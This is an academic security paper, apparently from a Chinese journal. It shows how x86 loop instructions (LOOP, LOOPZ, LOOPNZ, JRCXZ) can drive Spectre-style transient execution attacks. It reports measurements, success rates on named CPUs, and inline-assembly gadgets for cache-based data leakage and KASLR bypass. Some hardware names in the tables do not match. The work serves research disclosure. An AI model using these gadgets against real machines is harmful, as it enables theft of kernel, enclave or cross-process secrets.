A Novel Transient Execution Attack Exploiting Loop Prediction Mechanisms
-
摘要: 现代处理器广泛采用的分支预测技术虽然提升了指令流水线效率,但其推测执行机制产生的瞬态执行窗口已成为攻击的突破口。该文对现代处理器的分支预测技术进行了详细的分析,并对X86指令集中的指令进行了瞬态窗口的测量,发现X86架构中基于RCX寄存器值进行分支预测的循环指令(LOOP, LOOPZ, LOOPNZ)以及JRCXZ指令能够导致潜在的瞬态执行攻击。基此,该文构建了一种新型瞬态攻击原语,成功实现了4类攻击场景:(1)跨用户态/内核态边界实现数据泄露;(2)突破同步多线程(SMT)隔离构建隐蔽信道;(3)穿透Intel SGX安全区进行私密数据窃取;(4)推测内核地址空间布局随机化(KASLR)防护机制的内核基址。该文提出的攻击方法在真实处理器环境中得到验证,其攻击成功率较传统JCC指令实现方案平均提升90%。Abstract:
Objective Modern processors rely heavily on branch prediction to improve pipeline efficiency; however, the transient execution windows created by speculative execution expose critical security vulnerabilities. While prior research has primarily examined conditional branch instructions, this study identifies a previously overlooked attack surface: loop instructions (LOOP, LOOPZ, LOOPNZ) and JRCXZ in x86 architectures, which use the RCX register to determine branch outcomes. These instructions produce significantly longer transient windows than JCC instructions, posing heightened threats to hardware-level isolation. This work demonstrates the exploitability of these instructions, quantifies their transient execution behavior, and validates practical attack scenarios. Methods This study employs a systematic methodology to investigate the speculative behavior of loop instructions and assess their exploitability. First, the microarchitectural behavior of LOOP, LOOPZ, LOOPNZ, and JRCXZ instructions is reverse-engineered using Performance Monitoring Counters (PMCs), with a focus on their dependency on RCX register values and interaction with the branch prediction unit. Speculative durations of loop and JCC instructions are compared using cycle-accurate profiling via the RDPMC instruction, which accesses fixed-function PMCs to record clock cycles. Based on these observations, exploit primitives are constructed by manipulating RCX values to induce speculative execution paths. The feasibility of these primitives is evaluated through four real-world attack scenarios on Intel CPUs: (1) Cross-user/kernel data leakage through speculative memory access following mispredicted loop exits. (2) Covert channel creation between Simultaneous MultiThreading (SMT) threads by measuring timing differences between correctly and incorrectly predicted branches during speculative execution. (3) SGX enclave compromise via speculative access to secrets gated by RCX-controlled branching. (4) Kernel Address Space Layout Randomization (KASLR) bypass using page fault timing during transient execution of loop-based probes. Each scenario is tested on real hardware under controlled conditions to assess reliability, reproducibility, and attack robustness. Results and Discussions The proposed transient execution attack targeting loop instructions (LOOP, LOOPZ, LOOPNZ) and JRCXZ offers notable advantages over traditional Spectre exploits. These RCX-dependent instructions exhibit transient execution windows that are, on average, 40% longer than those of conventional JCC branches ( Table 1 ). The extended speculative duration significantly improves attack reliability: in cross-user/kernel boundary experiments, the proposed method achieves an average data leakage accuracy of 90%, compared to only 10% for JCC-based techniques under identical conditions. The attack also demonstrates high efficacy in bypassing hardware isolation mechanisms. In Intel SMT environments, a covert channel is established with 97.5% accuracy and a throughput of 256.9 kbit/s (Table 4 ), exploiting timing discrepancies between correctly and incorrectly predicted branches during speculative execution. In trusted execution environments, the attack achieves 98% accuracy in extracting secret values from Intel SGX enclaves, highlighting the susceptibility of RCX-controlled speculation to enclave compromise. Additionally, KASLR is completely defeated by exploiting speculative page fault timing during loop instruction execution. Kernel base addresses are recovered deterministically in all test cases (Fig. 4 ), demonstrating the critical security implications of this attack vector.Conclusions This study identifies a critical vulnerability in modern speculative execution mechanisms by demonstrating that loop instructions (LOOP, LOOPZ, LOOPNZ) and JRCXZ—which rely on the RCX register for branch decisions, serve as novel vectors for transient execution attacks. The key contributions are threefold: (1) These instructions generate speculative execution windows that are, on average, 40% longer than those of JCC instructions. (2) Practical exploits are demonstrated across key hardware isolation boundaries—including user/kernel space, SMT, and Intel SGX enclaves, with success rates exceeding 90% in targeted scenarios. (3) The findings expose critical limitations in current Spectre defenses, indicating that existing mitigations are insufficient to address RCX-dependent speculative paths, thereby motivating the need for specialized countermeasures. -
1 利用循环指令构建瞬态执行攻击原语的C语言算法
// probe_array: 攻击者控制的探测数组 addr: 攻击者构造的地址数组(含合法/非法地址) 1: void loop(void* addr, uint64 rcx) { 2: asm volatile( 3: "mov %2, %%rcx\n" // 初始化循环计数器 4: movq (%1, %%rcx, 8), %%rbx\n" // 加载初始地址至
RBX5: "1:\n" 6: "movzx (%%rbx), %%eax\n" // 敏感数据读取7: "shl $12, %%rax\n" // 生成探测数组偏移8: "movzx (%0, %%rax, 1), %%eax\n" // 缓存状态编码9: "movq (%1, %%rcx, 8), %%rbx\n" // 更新RBX地址10: "loop 1b\n" // 可以由LOOPZ/LOOPNZ指令替换 11: : 12: : "S" (probe_array), "r" (addr), "r" (rcx) 13: : "rax", "rbx", "rcx" 14: ); 15: } 2 利用 JRCXZ指令构建瞬态攻击原语的 C语言算法
// probe_array: 攻击者控制的探测数组 // addr: 地址数组,rcx: RCX条件数组,rsi: 初始索引 1: void jrcxz(void* addr, uint64_t* rcx, uint64_t rsi) { 2: asm volatile( 3: "mov %3, %%rsi\n" // 初始化循环索引 4: "movq (%1, %%rsi, 8), %%rbx\n" // 加载初始地址至
RBX5: "1:\n" 6: "movzx (%%rbx), %%eax\n" // 敏感数据读取7: "shl $12, %%rax\n" // 生成探测数组偏移8: "movzx (%0, %%rax, 1), %%eax\n" // 缓存状态编码9: "dec %%rsi\n" // 递减索引10: "movq (%1, %%rsi, 8), %%rbx\n" // 更新RBX地址11: "movq (%2, %%rsi, 8), %%rcx\n" // 加载下一轮RCX
条件12: "jrcxz 1b\n" // 条件跳转控制 13: : 14: : "S" (probe_array), "r" (addr), "r" (rcx), "r" (rsi) 15: : "rax", "rbx", "rcx", "rsi" 16: ); 17: } 表 1 不同场景下的条件分支指令的瞬态窗口大小 (时钟周期)
测量指令 使用寄存器 使用缓存 使用内存 LOOP 18 20 282 LOOPZ 21 22 286 LOOPNZ 22 23 282 JRCXZ 20 19 285 JE 14 19 279 表 2 攻击原语验证实验设备信息
处理器型号 处理器架构 微码版本 操作系统 内核版本 Intel i7-6700 Sky Lake 0xf0 Ubuntu 18.04 4.15.0-212-generic Intel i7-7700 Kabe Lake 0xf0 Ubuntu 18.04 5.4.0-150-generic Intel i5-7300U Kabe Lake 0xf0 Ubuntu 18.04 5.4.0-150-generic Intel i7-11700K Rocket Lake 0x63 Ubuntu 22.04 5.15.0-136-generic Intel i7-12700K Alder Lake 0x38 Ubuntu 22.04 5.15.0-135-generic AMD Ryzen 5 5600G Zen 3 0xa50000d Ubuntu 20.04 5.15.0-134-generic 表 3 概念验证攻击中不同处理器的数据泄露正确率 (%)
攻击使用的指令 Intel i7-6700 Intel i7-7700 Intel i7-7300U Intel i7-11700K Intel i7-12700K AMD Ryzen 55600G LOOP 41 97 97 5 63 0 JNZ 0 0 0 4 83 0 LOOPZ 96 100 100 70 98 100 LOOPNZ 96 98 100 83 100 100 JRCXZ 73 93 95 93 96 100 表 4 Intel与AMD处理器上的隐蔽信道实验结果
处理器型号 触发指令 正确率(%) 吞吐量(kbit/s) 处理器型号 触发指令 正确率(%) 吞吐量(kbit/s) Intel i7-7700 LOOP 98.2 272.5 AMD Ryzen 5 5600G LOOP 95.4 79.5 LOOPZ 97.9 276.7 LOOPZ 50.1 85.7 LOOPNZ 98.5 281.0 LOOPNZ 50.1 87.0 JRCXZ 95.2 197.5 JRCXZ 50.1 88.8 3 使用LOOP指令破解KASLR算法
// probe_array为攻击者控制的探测数组,addrs为攻击者可以控制的地址数组 1: void loop(void* addrs, uint64_t* rcx) { 2: asm volatile( 3: "movq $100, %%rdi\n" // 首先初始化寄存器,此处省略
初始化过程4: …… 5: "lp:\n" 6: "movzx (%%rbx), %%eax\n" // 访问猜测的偏移地址7: "add %%rdx, %%rax\n" // 将访问的结果与RDX寄存器
相加8: "movzx (%0, %%rax, 1), %%ebx\n" // 将上述计算结果
编码到探测数组9: "movq (%1, %%rcx, 8), %%rbx\n" 10: "movq (%3, %%rcx, 8), %%rdx\n" // 更新RDX寄存器11: "clflush (%2)\n" 12: "movq (%2, %%rcx, 8), %%rcx\n" // 此处为了提高正确
率,扩大瞬态窗口13: "loop lp\n" 14: : 15: : "S" (probe_array), "r" (addrs), "r" (rcx), "r"
(rdx_array)16: : "rax", "rbx", "rcx", "rdx", "rdi" 17: ); 18: } -
[1] 尹嘉伟, 李孟豪, 霍玮. 处理器微体系结构安全研究综述[J]. 信息安全学报, 2022, 7(4): 17–31. doi: 10.19363/J.cnki.cn10-1380/tn.2022.07.02.YIN Jiawei, LI Menghao, and HUO Wei. Survey on security researches of processor's microarchitecture[J]. Journal of Cyber Security, 2022, 7(4): 17–31. doi: 10.19363/J.cnki.cn10-1380/tn.2022.07.02. [2] SEZNEC A. Analysis of the O-GEometric history length branch predictor[C]. The 32nd International Symposium on Computer Architecture, Madison, USA, 2005: 394–405. doi: 10.1109/ISCA.2005.13. [3] JIMENEZ D A and LIN C. Dynamic branch prediction with perceptrons[C]. The HPCA Seventh International Symposium on High-Performance Computer Architecture, Monterrey, Mexico, 2001: 197–206. doi: 10.1109/HPCA.2001.903263. [4] 刘畅, 杨毅, 李昊儒, 等. 处理器分支预测攻击研究综述[J]. 计算机学报, 2022, 45(12): 2475–2509. doi: 10.11897/SP.J.1016.2022.02475.LIU Chang, YANG Yi, LI Haoru, et al. A survey of branch prediction attacks on modern processors[J]. Chinese Journal of Computers, 2022, 45(12): 2475–2509. doi: 10.11897/SP.J.1016.2022.02475. [5] KOCHER P, HORN J, FOGH A, et al. Spectre attacks: Exploiting speculative execution[C]. Proceedings of the 40th 2019 IEEE Symposium on Security and Privacy, San Francisco, USA, 2019: 1–19. doi: 10.1109/SP.2019.00002. [6] LIPP M, SCHWARZ M, GRUSS D, et al. Meltdown: Reading kernel memory from user space[C]. The 27th USENIX Conference on Security Symposium, Baltimore, USA, 2018: 973–990. [7] GRAS B, RAZAVI K, BOS H, et al. Translation leak-aside buffer: Defeating cache side-channel protections with TLB attacks[C]. The 27th USENIX Conference on Security Symposium, Baltimore, USA, 2018: 955–972. [8] CHOWDHURYY M H I, LIU Hang, and YAO Fan. BranchSpec: Information leakage attacks exploiting speculative branch instruction executions[C]. The 2020 IEEE 38th International Conference on Computer Design (ICCD), Hartford, USA, 2020: 529–536. doi: 10.1109/ICCD50377.2020.00095. [9] 杨帆, 张倩颖, 施智平, 等. 可信执行环境软件侧信道攻击研究综述[J]. 软件学报, 2023, 34(1): 381–403. doi: 10.13328/j.cnki.jos.006501.YANG Fan, ZHANG Qianying, SHI Zhiping, et al. Survey on software side-channel attacks in trusted execution environment[J]. Journal of Software, 2023, 34(1): 381–403. doi: 10.13328/j.cnki.jos.006501. [10] 王泉成, 唐明. 微架构安全漏洞攻击技术综述[J]. 密码学报(中英文), 2024, 11(6): 1199–1232. doi: 10.13868/j.cnki.jcr.000730.WANG Quancheng and TANG Ming. Survey of attack techniques for microarchitecture security vulnerabilities[J]. Journal of Cryptologic Research, 2024, 11(6): 1199–1232. doi: 10.13868/j.cnki.jcr.000730. [11] MOGHIMI D. Downfall: Exploiting speculative data gathering[C]. The 32nd USENIX Conference on Security Symposium, Anaheim, USA, 2023: 7179–7193. [12] VAN SCHAIK S, MILBURN A, ÖSTERLUND S, et al. RIDL: Rogue in-flight data load[C]. The 40th 2019 IEEE Symposium on Security and Privacy, San Francisco, USA, 2019: 88–105. doi: 10.1109/SP.2019.00087. [13] CANELLA C, GENKIN D, GINER L, et al. Fallout: Leaking data on meltdown-resistant CPUs[C]. The 2019 ACM SIGSAC Conference on Computer and Communications Security, London, United Kingdom, 2019: 769–784. doi: 10.1145/3319535.3363219. [14] SEZNEC A and MICHAUD P. A case for (partially) TAgged GEometric history length branch prediction[J]. Journal of Instruction-Level Parallelism, 2006, 8: 1–23. [15] YAVARZADEH H, TARAM M, NARAYAN S, et al. Half&Half: Demystifying Intel’s directional branch predictors for fast, secure partitioned execution[C]. Proceedings of the 44th 2023 IEEE Symposium on Security and Privacy, San Francisco, USA, 2023: 1220–1237. doi: 10.1109/SP46215.2023.10179415. [16] CHEN Yun, HAJIABADI A, and CARLSON T E. GADGETSPINNER: A new transient execution primitive using the loop stream detector[C]. The 30th 2024 IEEE International Symposium on High-Performance Computer Architecture, Edinburgh, United Kingdom, 2024: 15–30. doi: 10.1109/HPCA57654.2024.00013. [17] YAROM Y and FALKNER K. FLUSH+RELOAD: A high resolution, low noise, L3 cache side-channel attack[C]. The 23rd USENIX Conference on Security Symposium, San Diego, USA, 2014: 719–732. [18] QIU Pengfei, GAO Qiang, LIU Chang, et al. PMU-spill: A new side channel for transient execution attacks[J]. IEEE Transactions on Circuits and Systems I: Regular Papers, 2023, 70(12): 5048–5059. doi: 10.1109/TCSI.2023.3298913. [19] MAMBRETTI A, NEUGSCHWANDTNER M, SORNIOTTI A, et al. Speculator: A tool to analyze speculative execution attacks and mitigations[C]. The 35th Annual Computer Security Applications Conference, San Juan, USA, 2019: 747–761. doi: 10.1145/3359789.3359837. [20] EVTYUSHKIN D, RILEY R, ABU-GHAZALEH N C E, et al. BranchScope: A new side-channel attack on directional branch predictor[C]. The 23rd International Conference on Architectural Support for Programming Languages and Operating Systems, Williamsburg, USA, 2018: 693–707. doi: 10.1145/3173162.3173204. [21] HERNÁNDEZ C A R, LER W, and LIN W M. Branchboozle: A side-channel within a hidden pattern history table of modern branch prediction units[C]. The 36th Annual ACM Symposium on Applied Computing, Republic of Korea, 2021: 1617–1625. doi: 10.1145/3412841.3442035. [22] CHEN Guoxing, CHEN Sanchuan, XIAO Yuan, et al. SgxPectre: Stealing Intel secrets from SGX enclaves via speculative execution[C]. The 2019 IEEE European Symposium on Security and Privacy, Stockholm, Sweden, 2019: 142–157. doi: 10.1109/EuroSP.2019.00020. [23] CANELLA C, SCHWARZ M, HAUBENWALLNER M, et al. KASLR: Break it, fix it, repeat[C]. The 15th ACM Asia Conference on Computer and Communications Security, Taipei, China, 2020: 481–493. doi: 10.1145/3320269.338474. [24] The Linux Kernel. Speculation[EB/OL]. https://www.kernel.org/doc/html/latest/staging/speculation.html, 2025. [25] INTEL. Bounds check bypass/CVE-2017-5753/INTEL-SA-00088[EB/OL]. https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/advisory-guidance/bounds-check-bypass.html, 2018. -